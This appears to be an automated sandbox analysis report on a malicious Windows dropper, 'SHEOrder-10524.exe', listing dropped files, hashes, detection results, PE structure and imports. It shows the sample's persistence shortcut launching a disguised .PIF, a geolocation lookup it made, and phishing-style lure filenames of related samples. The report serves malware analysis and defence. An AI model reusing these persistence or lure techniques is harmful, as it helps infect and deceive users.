File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):131648
Entropy (8bit):5.225468064273746
Encrypted:false
SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
MD5:231CE1E1D7D98B44371FFFF407D68B59
SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: udVh4Ist4Z.exe, Detection: malicious
• Filename: Enquiry 230424.bat, Detection: malicious
• Filename: URGENTE_NOTIFICATION.cmd, Detection: malicious
• Filename: OKhCyJ619J.rtf, Detection: malicious
• Filename: fu56fbrtn8.exe, Detection: malicious
• Filename: FT. 40FE CNY .xlsx.lnk, Detection: malicious
• Filename: HFiHWvPsvA.rtf, Detection: malicious
• Filename: payment swift.xls, Detection: malicious
• Filename: VdwJB2cS5l.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.RATX-gen.9491.24773.exe, Detection: malicious

Process:C:\Users\user\Desktop\SHEOrder-10524.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):68096
Entropy (8bit):6.328046551801531
Encrypted:false
SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
MD5:C116D3604CEAFE7057D77FF27552C215
SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:
• Filename: udVh4Ist4Z.exe, Detection: malicious
• Filename: FT. 40FE CNY .xlsx.lnk, Detection: malicious
• Filename: ORDER-CONFIRMATION-DETAILS-000235374564.cmd, Detection: malicious
• Filename: RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ, Detection: malicious
• Filename: 20240416-703661.cmd, Detection: malicious
• Filename: disktop.pif.exe, Detection: malicious
• Filename: 82__GT7568.PDF.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Evo-gen.25660.20544.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Evo-gen.15258.6765.exe, Detection: malicious
• Filename: rKjlbIeOH9.exe, Detection: malicious

Process:C:\Users\user\Desktop\SHEOrder-10524.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):115180
Entropy (8bit):5.090281411774507
Encrypted:false
SSDEEP:1536:iuuRxID3z1yUXtZKmsryc/o5jdePNtq8YCl7MbiRVRBfY+u:iuuRa/ZZK4c/UePNtq8nRBfY+u
MD5:6BAAEA4D3A65281B55173738795EB02C
SHA1:1FBE7EC7F5E2D1FB0AB1807E149EEE66A86F9224
SHA-256:0007FA57DA2E1DE2E487492D00B99ABAECA7E9F9CAC8A10E24EB569E19F76EE1
SHA-512:AF0285CF961AEAE960EDE41F195809E9B84CCB262F17F2E994DA5C599EBDF712788E5A3F2E0E2ED16E67AA888BDABFD7A6096AD8DDA2D062D2F82B010E81D5C5
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 29%

Process:C:\Users\user\Desktop\SHEOrder-10524.exe
File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wagotghl.PIF">), ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):100
Entropy (8bit):5.065951690356517
Encrypted:false
SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMGKkNsysb9xvoTn:HRYFVmTWDyzzKkNhE9uTn
MD5:2DFA2FF8E8EBFC660F029A00606EAA0D
SHA1:30D99997A5AEDF0DD9980047AED5958A304FF192
SHA-256:842A9E2357260F4C66F47EDCB7CCBAE5BB960464CCAE6BCC352476C11F78E4EF
SHA-512:6D39CB55F1900BF948EB8ACCF22C22C54614FA54BBFBE679B0019F51971D1228CB8353FDC0FE4226F9CDF9677B5EE6B25B5BF6C3F2ACAC3A2EB50646383F2AA8
Malicious:true
Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wagotghl.PIF"..IconIndex=51..HotKey=32..

Process:C:\Users\Public\Libraries\lhgtogaW.pif
File Type:JSON data
Category:dropped
Size (bytes):965
Entropy (8bit):5.005233927773532
Encrypted:false
SSDEEP:12:tkbOnd66GkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkw7T:qbCdbauKyGX85jrvXhNlT3/7sYDsro
MD5:DA0FD37CC49697181AE27DA4C9D3C308
SHA1:A6555517791DFFC3DFD07C3A2467A957F90AA67C
SHA-256:540275576574073DDE26A8FABECB51D8A60343AE2EFE289628093D0B84430F19
SHA-512:D6E3EA3E4357FB1CF120405BEF882E4667F3D80A463C3FB8866F451CA55B2A78BF7EFF9F692814AFF436EE8DFD1073A5AD66D83DD7CA27CF2F78799F72B0F58F
Malicious:false
Preview:{. "geoplugin_request":"154.16.105.36",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Las Vegas",. "geoplugin_region":"Nevada",. "geoplugin_regionCode":"NV",. "geoplugin_regionName":"Nevada",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"839",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"36.1685",. "geoplugin_longitude":"-115.1164",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process:C:\Users\Public\Libraries\lhgtogaW.pif
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x60d7b9e7, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):20447232
Entropy (8bit):1.2830245920312073
Encrypted:false
SSDEEP:12288:BRSPOhijljKhBfvKDv2Q+555ckQB8WBbXnE:eii9PD7+
MD5:4C336803FF8AC0C91A05DBA8CB0DF08E
SHA1:6DA80AE9A13127F15EAB901DD775274A3332110E
SHA-256:AF1C30F795EAAF8BC5EBBE59D2190DDDA0C77F5D7B419C387A23DB7FC8554583
SHA-512:8D6907EF1B901D446D059FAB4AE3D755BE63B698F364CDB5253713F65FE20A3EF9092FD37B3D85DD43C0CB8B201D5D39E2EC93B54E00D050CE4FA59E0842E399
Malicious:false
                                                                                                                                                                  Preview:`..... ........=......J}...0...{........................"..........{.......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;..................................Ji>.....{....................dv.....{...........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..
                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Entropy (8bit):7.465739273228309
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                  File name:SHEOrder-10524.exe
                                                                                                                                                                  File size:1'646'592 bytes
                                                                                                                                                                  MD5:439f6db2adb770a0f825879c91da9904
                                                                                                                                                                  SHA1:6b997f099e01ba06378a58115f65d515a22f5fb1
                                                                                                                                                                  SHA256:9eef226fdb7d6c554cd552fc3f597ebfd6d77e33b95db53f7a631a75acf0c270
                                                                                                                                                                  SHA512:d3b5475ec41df26581757656b38ae4c20367bce638226b93c1ae2b890e0818c2cb1740fbf8b8108e244a5d5f48c78c0d0fa7fe382aa9fe321a3d696c6d5a30d3
                                                                                                                                                                  SSDEEP:24576:NGLyrlj2BH1btTfnxx+KKozJQd/HJNRO/BPTQ+l04pEnlk8U2flxAu:NGup2B+K1mzyPTQh4psG2Z
                                                                                                                                                                  TLSH:6D75CF61A3E0D2B7F03B10FED439B55961C1F9A4281774DDB2D50B7BDA3BA83240929E
                                                                                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                  Icon Hash:3575b4a8b0b085d1
                                                                                                                                                                  Entrypoint:0x458744
                                                                                                                                                                  Entrypoint Section:.itext
                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                  DLL Characteristics:
                                                                                                                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                  File Version Major:4
                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                  Import Hash:24201b9cc75fb3152043567a88788f77
                                                                                                                                                                  Instruction
                                                                                                                                                                  push ebp
                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                  add esp, FFFFFFF0h
                                                                                                                                                                  mov eax, 00457598h
                                                                                                                                                                  call 00007F91FD4D4371h
                                                                                                                                                                  mov eax, dword ptr [0056D9CCh]
                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                  call 00007F91FD51E5A1h
                                                                                                                                                                  mov ecx, dword ptr [0056D8F8h]
                                                                                                                                                                  mov eax, dword ptr [0056D9CCh]
                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                  mov edx, dword ptr [004573A8h]
                                                                                                                                                                  call 00007F91FD51E5A1h
                                                                                                                                                                  mov eax, dword ptr [0056D9CCh]
                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                  call 00007F91FD51E615h
                                                                                                                                                                  call 00007F91FD4D23ECh
                                                                                                                                                                  lea eax, dword ptr [eax+00h]
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x172000 | 0x2458 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x17e000 | 0x1d600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x177000 | 0x6004 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x176000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1726c4 | 0x5ac | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x567a8 | 0x56800 | 6a621138800e4fc13ef140de97c6996f | False | 0.5254103820447977 | data | 6.528612856084684 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x58000 | 0x78c | 0x800 | 0e9c13d49823b5ca1d42064cbd1f0092 | False | 0.599609375 | data | 6.053557254879556 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x59000 | 0x114b4c | 0x114c00 | 3acb4562bcf371fa16f2a119d4b75641 | False | 0.7514926321138211 | data | 7.616808019743606 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x16e000 | 0x366c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x172000 | 0x2458 | 0x2600 | c85b3f4d3bbb9ee5349ade0f29b833d0 | False | 0.3120888157894737 | data | 5.039584381610788 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x175000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x176000 | 0x18 | 0x200 | 88744f318d155b3dd9496b461da5975c | False | 0.05078125 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x177000 | 0x6004 | 0x6200 | 2a6ccb22f49dc9fd8aaf7def97e5b3ba | False | 0.6501116071428571 | data | 6.6666599437422525 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x17e000 | 0x1d600 | 0x1d600 | 5081eacda8ebfe8b68766e525cc078a1 | False | 0.14349235372340424 | data | 4.253899981413597 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x17eb4c | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x17ec80 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x17edb4 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x17eee8 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x17f01c | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x17f150 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x17f284 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x17f3b8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x17f588 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x17f76c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x17f93c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x17fb0c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x17fcdc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x17feac | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x18007c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x18024c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x18041c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x1805ec | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_ICON | 0x1806d4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.28635084427767354
RT_ICON | 0x18177c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.18278008298755186
RT_ICON | 0x183d24 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m | | | 0.11275415896487985
RT_ICON | 0x1891ac | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 3779 x 3779 px/m | | | 0.10086466165413534
RT_ICON | 0x18f994 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m | | | 0.08608366617616145
RT_DIALOG | 0x198e3c | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x198e90 | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0x198ee4 | 0x2c | data | | | 0.4772727272727273
RT_STRING | 0x198f10 | 0x2b4 | data | | | 0.476878612716763
RT_STRING | 0x1991c4 | 0xb4 | data | | | 0.6888888888888889
RT_STRING | 0x199278 | 0xe8 | data | | | 0.6422413793103449
RT_STRING | 0x199360 | 0x2a8 | data | | | 0.4764705882352941
RT_STRING | 0x199608 | 0x3e8 | data | | | 0.382
RT_STRING | 0x1999f0 | 0x370 | data | | | 0.4022727272727273
RT_STRING | 0x199d60 | 0x3cc | data | | | 0.33539094650205764
RT_STRING | 0x19a12c | 0x214 | data | | | 0.49624060150375937
RT_STRING | 0x19a340 | 0xcc | data | | | 0.6274509803921569
RT_STRING | 0x19a40c | 0x194 | data | | | 0.5643564356435643
RT_STRING | 0x19a5a0 | 0x3c4 | data | | | 0.3288381742738589
RT_STRING | 0x19a964 | 0x338 | data | | | 0.42961165048543687
RT_STRING | 0x19ac9c | 0x294 | data | | | 0.42424242424242425
RT_RCDATA | 0x19af30 | 0x10 | data | | | 1.5
RT_RCDATA | 0x19af40 | 0x298 | data | | | 0.7364457831325302
RT_RCDATA | 0x19b1d8 | 0x15e | Delphi compiled form 'TfrmMain' | | | 0.7571428571428571
RT_GROUP_CURSOR | 0x19b338 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x19b34c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x19b360 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x19b374 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x19b388 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x19b39c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x19b3b0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x19b3c4 | 0x4c | data | | | 0.8421052631578947
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
kernel32.dll | Sleep
